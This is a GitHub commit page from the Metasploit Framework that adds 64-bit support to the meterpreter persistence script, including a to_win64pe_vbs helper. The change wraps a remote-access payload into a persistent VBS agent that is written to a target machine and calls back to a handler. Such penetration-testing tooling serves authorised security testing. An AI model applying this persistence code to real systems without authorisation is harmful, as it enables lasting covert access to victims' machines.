Skip to content

Commit ee07809

Browse files
author
Brent Cook
committed
Land rapid7#5190, 64-bit meterpreter persistence script
2 parents 1d5a054 + e7babc4 commit ee07809

File tree

2 files changed

+21
-7
lines changed

2 files changed

+21
-7
lines changed

lib/msf/util/exe.rb

Lines changed: 4 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1121,6 +1121,10 @@ def self.to_win32pe_vbs(framework, code, opts = {})
11211121
to_exe_vbs(to_win32pe(framework, code, opts), opts)
11221122
end
11231123

1124+
def self.to_win64pe_vbs(framework, code, opts = {})
1125+
to_exe_vbs(to_win64pe(framework, code, opts), opts)
1126+
end
1127+
11241128
# Creates a jar file that drops the provided +exe+ into a random file name
11251129
# in the system's temp dir and executes it.
11261130
#

scripts/meterpreter/persistence.rb

Lines changed: 17 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -72,13 +72,23 @@ def create_payload(payload_type,lhost,lport)
7272

7373
# Function for Creating persistent script
7474
#-------------------------------------------------------------------------------
75-
def create_script(delay,altexe,raw)
76-
if altexe
77-
vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw,
78-
{:persist => true, :delay => delay, :template => altexe})
75+
def create_script(delay,altexe,raw,is_x64)
76+
if is_x64
77+
if altexe
78+
vbs = ::Msf::Util::EXE.to_win64pe_vbs(@client.framework, raw,
79+
{:persist => true, :delay => delay, :template => altexe})
80+
else
81+
vbs = ::Msf::Util::EXE.to_win64pe_vbs(@client.framework, raw,
82+
{:persist => true, :delay => delay})
83+
end
7984
else
80-
vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw,
81-
{:persist => true, :delay => delay})
85+
if altexe
86+
vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw,
87+
{:persist => true, :delay => delay, :template => altexe})
88+
else
89+
vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw,
90+
{:persist => true, :delay => delay})
91+
end
8292
end
8393
print_status("Persistent agent script is #{vbs.length} bytes long")
8494
return vbs
@@ -224,7 +234,7 @@ def install_as_service(script_on_target)
224234
print_status("Resource file for cleanup created at #{@clean_up_rc}")
225235
# Create and Upload Payload
226236
raw = create_payload(payload_type, rhost, rport)
227-
script = create_script(delay, altexe, raw)
237+
script = create_script(delay, altexe, raw, payload_type.include?('/x64/'))
228238
script_on_target = write_script_to_target(target_dir, script)
229239

230240
# Start Multi/Handler

0 commit comments

Comments
 (0)